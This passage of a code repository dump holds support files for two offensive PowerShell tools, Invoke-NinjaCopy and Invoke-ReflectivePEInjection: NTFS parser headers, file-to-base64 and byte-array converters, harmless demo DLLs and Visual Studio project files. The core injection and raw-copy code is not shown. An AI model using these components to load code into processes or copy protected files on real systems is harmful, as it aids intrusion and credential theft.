174 | typedef struct tagATTR_HEADER_NON_RESIDENT
175 | {
176 | ATTR_HEADER_COMMON Header; // Common data structure
177 | ULONGLONG StartVCN; // Starting VCN
178 | ULONGLONG LastVCN; // Last VCN
179 | WORD DataRunOffset; // Offset to the Data Runs
180 | WORD CompUnitSize; // Compression unit size
181 | DWORD Padding; // Padding
182 | ULONGLONG AllocSize; // Allocated size of the attribute
183 | ULONGLONG RealSize; // Real size of the attribute
184 | ULONGLONG IniSize; // Initialized data size of the stream
185 | } ATTR_HEADER_NON_RESIDENT;
186 |
187 |
188 | // Attribute: STANDARD_INFORMATION
189 |
190 | #define ATTR_STDINFO_PERMISSION_READONLY 0x00000001
191 | #define ATTR_STDINFO_PERMISSION_HIDDEN 0x00000002
192 | #define ATTR_STDINFO_PERMISSION_SYSTEM 0x00000004
193 | #define ATTR_STDINFO_PERMISSION_ARCHIVE 0x00000020
194 | #define ATTR_STDINFO_PERMISSION_DEVICE 0x00000040
195 | #define ATTR_STDINFO_PERMISSION_NORMAL 0x00000080
196 | #define ATTR_STDINFO_PERMISSION_TEMP 0x00000100
197 | #define ATTR_STDINFO_PERMISSION_SPARSE 0x00000200
198 | #define ATTR_STDINFO_PERMISSION_REPARSE 0x00000400
199 | #define ATTR_STDINFO_PERMISSION_COMPRESSED 0x00000800
200 | #define ATTR_STDINFO_PERMISSION_OFFLINE 0x00001000
201 | #define ATTR_STDINFO_PERMISSION_NCI 0x00002000
202 | #define ATTR_STDINFO_PERMISSION_ENCRYPTED 0x00004000
203 |
204 | typedef struct tagATTR_STANDARD_INFORMATION
205 | {
206 | ULONGLONG CreateTime; // File creation time
207 | ULONGLONG AlterTime; // File altered time
208 | ULONGLONG MFTTime; // MFT changed time
209 | ULONGLONG ReadTime; // File read time
210 | DWORD Permission; // Dos file permission
211 | DWORD MaxVersionNo; // Maxim number of file versions
212 | DWORD VersionNo; // File version number
213 | DWORD ClassId; // Class Id
214 | DWORD OwnerId; // Owner Id
215 | DWORD SecurityId; // Security Id
216 | ULONGLONG QuotaCharged; // Quota charged
217 | ULONGLONG USN; // USN Journel
218 | } ATTR_STANDARD_INFORMATION;
219 |
220 |
221 | // Attribute: ATTRIBUTE_LIST
222 |
223 | typedef struct tagATTR_ATTRIBUTE_LIST
224 | {
225 | DWORD AttrType; // Attribute type
226 | WORD RecordSize; // Record length
227 | BYTE NameLength; // Name length in characters
228 | BYTE NameOffset; // Name offset
229 | ULONGLONG StartVCN; // Start VCN
230 | ULONGLONG BaseRef; // Base file reference to the attribute
231 | WORD AttrId; // Attribute Id
232 | } ATTR_ATTRIBUTE_LIST;
233 |
234 | // Attribute: FILE_NAME
235 |
236 | #define ATTR_FILENAME_FLAG_READONLY 0x00000001
237 | #define ATTR_FILENAME_FLAG_HIDDEN 0x00000002
238 | #define ATTR_FILENAME_FLAG_SYSTEM 0x00000004
239 | #define ATTR_FILENAME_FLAG_ARCHIVE 0x00000020
240 | #define ATTR_FILENAME_FLAG_DEVICE 0x00000040
241 | #define ATTR_FILENAME_FLAG_NORMAL 0x00000080
242 | #define ATTR_FILENAME_FLAG_TEMP 0x00000100
243 | #define ATTR_FILENAME_FLAG_SPARSE 0x00000200
244 | #define ATTR_FILENAME_FLAG_REPARSE 0x00000400
245 | #define ATTR_FILENAME_FLAG_COMPRESSED 0x00000800
246 | #define ATTR_FILENAME_FLAG_OFFLINE 0x00001000
247 | #define ATTR_FILENAME_FLAG_NCI 0x00002000
248 | #define ATTR_FILENAME_FLAG_ENCRYPTED 0x00004000
249 | #define ATTR_FILENAME_FLAG_DIRECTORY 0x10000000
250 | #define ATTR_FILENAME_FLAG_INDEXVIEW 0x20000000
251 |
252 | #define ATTR_FILENAME_NAMESPACE_POSIX 0x00
253 | #define ATTR_FILENAME_NAMESPACE_WIN32 0x01
254 | #define ATTR_FILENAME_NAMESPACE_DOS 0x02
255 |
256 | typedef struct tagATTR_FILE_NAME
257 | {
258 | ULONGLONG ParentRef; // File reference to the parent directory
259 | ULONGLONG CreateTime; // File creation time
260 | ULONGLONG AlterTime; // File altered time
261 | ULONGLONG MFTTime; // MFT changed time
262 | ULONGLONG ReadTime; // File read time
263 | ULONGLONG AllocSize; // Allocated size of the file
264 | ULONGLONG RealSize; // Real size of the file
265 | DWORD Flags; // Flags
266 | DWORD ER; // Used by EAs and Reparse
267 | BYTE NameLength; // Filename length in characters
268 | BYTE NameSpace; // Filename space
269 | WORD Name[1]; // Filename
270 | } ATTR_FILE_NAME;
271 |
272 |
273 | // Attribute: VOLUME_INFORMATION
274 |
275 | #define ATTR_VOLINFO_FLAG_DIRTY 0x0001 // Dirty
276 | #define ATTR_VOLINFO_FLAG_RLF 0x0002 // Resize logfile
277 | #define ATTR_VOLINFO_FLAG_UOM 0x0004 // Upgrade on mount
278 | #define ATTR_VOLINFO_FLAG_MONT 0x0008 // Mounted on NT4
279 | #define ATTR_VOLINFO_FLAG_DUSN 0x0010 // Delete USN underway
280 | #define ATTR_VOLINFO_FLAG_ROI 0x0020 // Repair object Ids
281 | #define ATTR_VOLINFO_FLAG_MBC 0x8000 // Modified by chkdsk
282 |
283 | typedef struct tagATTR_VOLUME_INFORMATION
284 | {
285 | BYTE Reserved1[8]; // Always 0 ?
286 | BYTE MajorVersion; // Major version
287 | BYTE MinorVersion; // Minor version
288 | WORD Flags; // Flags
289 | BYTE Reserved2[4]; // Always 0 ?
290 | } ATTR_VOLUME_INFORMATION;
291 |
292 |
293 | // Attribute: INDEX_ROOT
294 | /******************************
295 | INDEX_ROOT
296 | ---------------------
297 | | Index Root Header |
298 | ---------------------
299 | | Index Header |
300 | ---------------------
301 | | Index Entry |
302 | ---------------------
303 | | Index Entry |
304 | ---------------------
305 | | ...... |
306 | ---------------------
307 | *******************************/
308 |
309 | #define ATTR_INDEXROOT_FLAG_SMALL 0x00 // Fits in Index Root File Record
310 | #define ATTR_INDEXROOT_FLAG_LARGE 0x01 // Index Allocation and Bitmap needed
311 |
312 | typedef struct tagATTR_INDEX_ROOT
313 | {
314 | // Index Root Header
315 | DWORD AttrType; // Attribute type (ATTR_TYPE_FILE_NAME: Directory, 0: Index View)
316 | DWORD CollRule; // Collation rule
317 | DWORD IBSize; // Size of index block
318 | BYTE ClustersPerIB; // Clusters per index block (same as BPB?)
319 | BYTE Padding1[3]; // Padding
320 | // Index Header
321 | DWORD EntryOffset; // Offset to the first index entry, relative to this address(0x10)
322 | DWORD TotalEntrySize; // Total size of the index entries
323 | DWORD AllocEntrySize; // Allocated size of the index entries
324 | BYTE Flags; // Flags
325 | BYTE Padding2[3]; // Padding
326 | } ATTR_INDEX_ROOT;
327 |
328 |
329 | // INDEX ENTRY
330 |
331 | #define INDEX_ENTRY_FLAG_SUBNODE 0x01 // Index entry points to a sub-node
332 | #define INDEX_ENTRY_FLAG_LAST 0x02 // Last index entry in the node, no Stream
333 |
334 | typedef struct tagINDEX_ENTRY
335 | {
336 | ULONGLONG FileReference; // Low 6B: MFT record index, High 2B: MFT record sequence number
337 | WORD Size; // Length of the index entry
338 | WORD StreamSize; // Length of the stream
339 | BYTE Flags; // Flags
340 | BYTE Padding[3]; // Padding
341 | BYTE Stream[1]; // Stream
342 | // VCN of the sub node in Index Allocation, Offset = Size - 8
343 | } INDEX_ENTRY;
344 |
345 |
346 | // INDEX BLOCK
347 | /******************************
348 | INDEX_BLOCK
349 | -----------------------
350 | | Index Block Header |
351 | -----------------------
352 | | Index Header |
353 | -----------------------
354 | | Index Entry |
355 | -----------------------
356 | | Index Entry |
357 | -----------------------
358 | | ...... |
359 | -----------------------
360 | *******************************/
361 |
362 | #define INDEX_BLOCK_MAGIC 'XDNI'
363 |
364 | typedef struct tagINDEX_BLOCK
365 | {
366 | // Index Block Header
367 | DWORD Magic; // "INDX"
368 | WORD OffsetOfUS; // Offset of Update Sequence
369 | WORD SizeOfUS; // Size in words of Update Sequence Number & Array
370 | ULONGLONG LSN; // $LogFile Sequence Number
371 | ULONGLONG VCN; // VCN of this index block in the index allocation
372 | // Index Header
373 | DWORD EntryOffset; // Offset of the index entries, relative to this address(0x18)
374 | DWORD TotalEntrySize; // Total size of the index entries
375 | DWORD AllocEntrySize; // Allocated size of index entries
376 | BYTE NotLeaf; // 1 if not leaf node (has children)
377 | BYTE Padding[3]; // Padding
378 | } INDEX_BLOCK;
379 |
380 | #endif
381 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParserDLL/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | DYNAMIC LINK LIBRARY : NTFSParserDLL Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this NTFSParserDLL DLL for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your NTFSParserDLL application.
9 |
10 |
11 | NTFSParserDLL.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | NTFSParserDLL.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | NTFSParserDLL.cpp
25 | This is the main DLL source file.
26 |
27 | When created, this DLL does not export any symbols. As a result, it
28 | will not produce a .lib file when it is built. If you wish this project
29 | to be a project dependency of some other project, you will either need to
30 | add code to export some symbols from the DLL so that an export library
31 | will be produced, or you can set the Ignore Input Library property to Yes
32 | on the General propert page of the Linker folder in the project's Property
33 | Pages dialog box.
34 |
35 | /////////////////////////////////////////////////////////////////////////////
36 | Other standard files:
37 |
38 | StdAfx.h, StdAfx.cpp
39 | These files are used to build a precompiled header (PCH) file
40 | named NTFSParserDLL.pch and a precompiled types file named StdAfx.obj.
41 |
42 | /////////////////////////////////////////////////////////////////////////////
43 | Other notes:
44 |
45 | AppWizard uses "TODO:" comments to indicate parts of the source code you
46 | should add to or customize.
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParserDLL/dllmain.cpp:
--------------------------------------------------------------------------------
1 | /*
2 | *
3 | * Copyright(C) 2013 Joe Bialek Twitter:@JosephBialek
4 | *
5 | * This program/include file is free software; you can redistribute it and/or
6 | * modify it under the terms of the GNU General Public License as published
7 | * by the Free Software Foundation; either version 2 of the License, or
8 | * (at your option) any later version.
9 | *
10 | * This program/include file is distributed in the hope that it will be
11 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
12 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
13 | * GNU General Public License for more details.
14 | */
15 | //
16 | // This code uses libraries released under GPLv2(or later) written by cyb70289
17 |
18 | // dllmain.cpp : Defines the entry point for the DLL application.
19 | #include "stdafx.h"
20 |
21 | BOOL APIENTRY DllMain( HMODULE hModule,
22 | DWORD ul_reason_for_call,
23 | LPVOID lpReserved
24 | )
25 | {
26 | switch (ul_reason_for_call)
27 | {
28 | case DLL_PROCESS_ATTACH:
29 | case DLL_THREAD_ATTACH:
30 | case DLL_THREAD_DETACH:
31 | case DLL_PROCESS_DETACH:
32 | break;
33 | }
34 | return TRUE;
35 | }
36 |
37 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParserDLL/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // NTFSParserDLL.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParserDLL/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include
13 | #include
14 | #include
15 |
16 |
17 |
18 | // TODO: reference additional headers your program requires here
19 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParserDLL/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/README.md:
--------------------------------------------------------------------------------
1 | The tools in this directory are part of PowerSploit and are being maintained there. They are preserved here for legacy, but any bug fixes should be checked in to PowerSploit.
2 |
3 | https://github.com/mattifestation/PowerSploit
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/Convert-FileToBase64String.ps1:
--------------------------------------------------------------------------------
1 | Param(
2 | [Parameter(Position=0, Mandatory=$true)]
3 | [String]
4 | $File
5 | )
6 |
7 | [Byte[]]$Bytes = [System.IO.File]::ReadAllBytes($File)
8 |
9 | $B64String = [String][Convert]::ToBase64String($Bytes)
10 |
11 | Write-Output $B64String
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/Convert-FileToByteArrayString.ps1:
--------------------------------------------------------------------------------
1 | Param(
2 | [Parameter(Position=0, Mandatory=$true)]
3 | [String]
4 | $File
5 | )
6 |
7 | [Byte[]]$Bytes = [System.IO.File]::ReadAllBytes($File)
8 |
9 | $ByteStr = ""
10 | for ($i = 0; $i -lt $Bytes.Length; $i++)
11 | {
12 | $ByteStr += $Bytes[$i]
13 | if ($i -ne ($Bytes.Length-1))
14 | {
15 | $ByteStr += ","
16 | }
17 | }
18 |
19 | return $ByteStr
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoDLL/DemoDLL.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 11.00
3 | # Visual Studio 2010
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoDLL", "DemoDLL\DemoDLL.vcxproj", "{F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Debug|x64 = Debug|x64
10 | Release|Win32 = Release|Win32
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|Win32.ActiveCfg = Debug|Win32
15 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|Win32.Build.0 = Debug|Win32
16 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|x64.ActiveCfg = Debug|x64
17 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|x64.Build.0 = Debug|x64
18 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|Win32.ActiveCfg = Release|Win32
19 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|Win32.Build.0 = Release|Win32
20 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|x64.ActiveCfg = Release|x64
21 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|x64.Build.0 = Release|x64
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoDLL/DemoDLL/DemoDLL.cpp:
--------------------------------------------------------------------------------
1 | // DemoDLL.cpp : Defines the exported functions for the DLL application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include "DemoDLL.h"
6 |
7 | using namespace std;
8 |
9 |
10 | extern "C" __declspec( dllexport ) char* StringFunc()
11 | {
12 | ostream *outputStream = NULL;
13 |
14 | //If you want to output to cout, simply set outputStream to &cout. This allows you to write a program that can switch between outputting to string or to cout.
15 | //outputStream = &cout;
16 |
17 | ostringstream *stringStream = new ostringstream();
18 | outputStream = stringStream;
19 |
20 | (*outputStream) << "String DLL function is working" << endl << endl;
21 |
22 | string output = (*stringStream).str();
23 | const char* outputStr = output.c_str();
24 |
25 | char* out = new char[output.size()+1];
26 | strcpy(out, outputStr);
27 | out[output.size()] = '\0';
28 |
29 |
30 | return out;
31 | }
32 |
33 | extern "C" __declspec( dllexport ) void VoidFunc()
34 | {
35 | printf("Void DLL function is working, using printf to display. You will only see this if you run locally.\n\n");
36 | return;
37 | }
38 |
39 | extern "C" __declspec( dllexport ) wchar_t* WStringFunc()
40 | {
41 | wostream *outputStream = NULL;
42 |
43 | //If you want to output to wcout, simply set outputStream to &cout. This allows you to write a program that can switch between outputting to wstring or to wcout.
44 | outputStream = &wcout;
45 |
46 | wostringstream *stringStream = new wostringstream();
47 | outputStream = stringStream;
48 |
49 | (*outputStream) << L"WString DLL function is working" << endl << endl;
50 |
51 | wstring output = (*stringStream).str();
52 | const wchar_t* outputStr = output.c_str();
53 |
54 | wchar_t* out = new wchar_t[output.size()+1];
55 | wcscpy(out, outputStr);
56 | out[output.size()] = '\0';
57 |
58 |
59 | return out;
60 | }
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoDLL/DemoDLL/DemoDLL.h:
--------------------------------------------------------------------------------
1 | // The following ifdef block is the standard way of creating macros which make exporting
2 | // from a DLL simpler. All files within this DLL are compiled with the DEMODLL_EXPORTS
3 | // symbol defined on the command line. This symbol should not be defined on any project
4 | // that uses this DLL. This way any other project whose source files include this file see
5 | // DEMODLL_API functions as being imported from a DLL, whereas this DLL sees symbols
6 | // defined with this macro as being exported.
7 | #ifdef DEMODLL_EXPORTS
8 | #define DEMODLL_API __declspec(dllexport)
9 | #else
10 | #define DEMODLL_API __declspec(dllimport)
11 | #endif
12 |
13 | using namespace std;
14 |
15 | extern "C" __declspec( dllexport ) char* StringFunc();
16 | extern "C" __declspec( dllexport ) void VoidFunc();
17 | extern "C" __declspec( dllexport ) wchar_t* WStringFunc();
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoDLL/DemoDLL/DemoDLL.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Debug
10 | x64
11 |
12 |
13 | Release
14 | Win32
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}
23 | Win32Proj
24 | DemoDLL
25 |
26 |
27 |
28 | DynamicLibrary
29 | true
30 | Unicode
31 | v120
32 |
33 |
34 | DynamicLibrary
35 | true
36 | Unicode
37 | v120
38 |
39 |
40 | DynamicLibrary
41 | false
42 | true
43 | Unicode
44 | v120
45 |
46 |
47 | DynamicLibrary
48 | false
49 | true
50 | Unicode
51 | v120
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 | true
71 |
72 |
73 | true
74 |
75 |
76 | false
77 |
78 |
79 | false
80 |
81 |
82 |
83 | Use
84 | Level3
85 | Disabled
86 | WIN32;_DEBUG;_WINDOWS;_USRDLL;DEMODLL_EXPORTS;%(PreprocessorDefinitions)
87 |
88 |
89 | Windows
90 | true
91 |
92 |
93 |
94 |
95 | Use
96 | Level3
97 | Disabled
98 | WIN32;_DEBUG;_WINDOWS;_USRDLL;DEMODLL_EXPORTS;%(PreprocessorDefinitions)
99 |
100 |
101 | Windows
102 | true
103 |
104 |
105 |
106 |
107 | Level3
108 | Use
109 | MaxSpeed
110 | true
111 | true
112 | WIN32;NDEBUG;_WINDOWS;_USRDLL;DEMODLL_EXPORTS;%(PreprocessorDefinitions)
113 |
114 |
115 | Windows
116 | true
117 | true
118 | true
119 |
120 |
121 |
122 |
123 | Level3
124 | Use
125 | MaxSpeed
126 | true
127 | true
128 | WIN32;NDEBUG;_WINDOWS;_USRDLL;DEMODLL_EXPORTS;%(PreprocessorDefinitions)
129 | MultiThreaded
130 |
131 |
132 | Windows
133 | true
134 | true
135 | true
136 |
137 |
138 |
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 | false
150 | false
151 |
152 |
153 |
154 |
155 | false
156 | false
157 |
158 |
159 |
160 |
161 |
162 |
163 | Create
164 | Create
165 | Create
166 | Create
167 |
168 |
169 |
170 |
171 |
172 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoDLL/DemoDLL/DemoDLL.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 | Header Files
29 |
30 |
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 | Source Files
40 |
41 |
42 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoDLL/DemoDLL/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | DYNAMIC LINK LIBRARY : DemoDLL Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this DemoDLL DLL for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your DemoDLL application.
9 |
10 |
11 | DemoDLL.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | DemoDLL.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | DemoDLL.cpp
25 | This is the main DLL source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named DemoDLL.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoDLL/DemoDLL/dllmain.cpp:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Defines the entry point for the DLL application.
2 | #include "stdafx.h"
3 |
4 | BOOL APIENTRY DllMain( HMODULE hModule,
5 | DWORD ul_reason_for_call,
6 | LPVOID lpReserved
7 | )
8 | {
9 | switch (ul_reason_for_call)
10 | {
11 | case DLL_PROCESS_ATTACH:
12 | case DLL_THREAD_ATTACH:
13 | case DLL_THREAD_DETACH:
14 | case DLL_PROCESS_DETACH:
15 | break;
16 | }
17 | return TRUE;
18 | }
19 |
20 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoDLL/DemoDLL/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // DemoDLL.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoDLL/DemoDLL/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 |
18 |
19 |
20 | // TODO: reference additional headers your program requires here
21 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoDLL/DemoDLL/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2012
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoDLL_RemoteProcess", "DemoDLL_RemoteProcess\DemoDLL_RemoteProcess.vcxproj", "{3C031A7E-A99B-465E-ADF0-1350A94F1F5D}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Debug|x64 = Debug|x64
10 | Release|Win32 = Release|Win32
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|Win32.ActiveCfg = Debug|Win32
15 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|Win32.Build.0 = Debug|Win32
16 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|x64.ActiveCfg = Debug|x64
17 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|x64.Build.0 = Debug|x64
18 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|Win32.ActiveCfg = Release|Win32
19 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|Win32.Build.0 = Release|Win32
20 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|x64.ActiveCfg = Release|x64
21 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|x64.Build.0 = Release|x64
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.cpp:
--------------------------------------------------------------------------------
1 | // DemoDLL_RemoteProcess.cpp : Defines the exported functions for the DLL application.
2 | //
3 |
4 | #include "stdafx.h"
5 |
6 | using namespace std;
7 |
8 | extern "C" __declspec( dllexport ) void VoidFunc();
9 |
10 |
11 | extern "C" __declspec( dllexport ) void VoidFunc()
12 | {
13 | ofstream myfile;
14 | _mkdir("c:\\ReflectiveLoaderTest");
15 | myfile.open ("c:\\ReflectiveLoaderTest\\DllVoidFunction.txt");
16 | myfile << "Dll Void function successfully called.\n";
17 | myfile.close();
18 | return;
19 | }
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Debug
10 | x64
11 |
12 |
13 | Release
14 | Win32
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}
23 | Win32Proj
24 | DemoDLL_RemoteProcess
25 |
26 |
27 |
28 | DynamicLibrary
29 | true
30 | v120
31 | Unicode
32 |
33 |
34 | DynamicLibrary
35 | true
36 | v120
37 | Unicode
38 |
39 |
40 | DynamicLibrary
41 | false
42 | v120
43 | true
44 | Unicode
45 |
46 |
47 | DynamicLibrary
48 | false
49 | v120
50 | true
51 | Unicode
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 | true
71 |
72 |
73 | true
74 |
75 |
76 | false
77 |
78 |
79 | false
80 |
81 |
82 |
83 | Use
84 | Level3
85 | Disabled
86 | WIN32;_DEBUG;_WINDOWS;_USRDLL;DEMODLL_REMOTEPROCESS_EXPORTS;%(PreprocessorDefinitions)
87 | true
88 |
89 |
90 | Windows
91 | true
92 |
93 |
94 |
95 |
96 | Use
97 | Level3
98 | Disabled
99 | WIN32;_DEBUG;_WINDOWS;_USRDLL;DEMODLL_REMOTEPROCESS_EXPORTS;%(PreprocessorDefinitions)
100 | true
101 |
102 |
103 | Windows
104 | true
105 |
106 |
107 |
108 |
109 | Level3
110 | Use
111 | MaxSpeed
112 | true
113 | true
114 | WIN32;NDEBUG;_WINDOWS;_USRDLL;DEMODLL_REMOTEPROCESS_EXPORTS;%(PreprocessorDefinitions)
115 | true
116 |
117 |
118 | Windows
119 | true
120 | true
121 | true
122 |
123 |
124 |
125 |
126 | Level3
127 | Use
128 | MaxSpeed
129 | true
130 | true
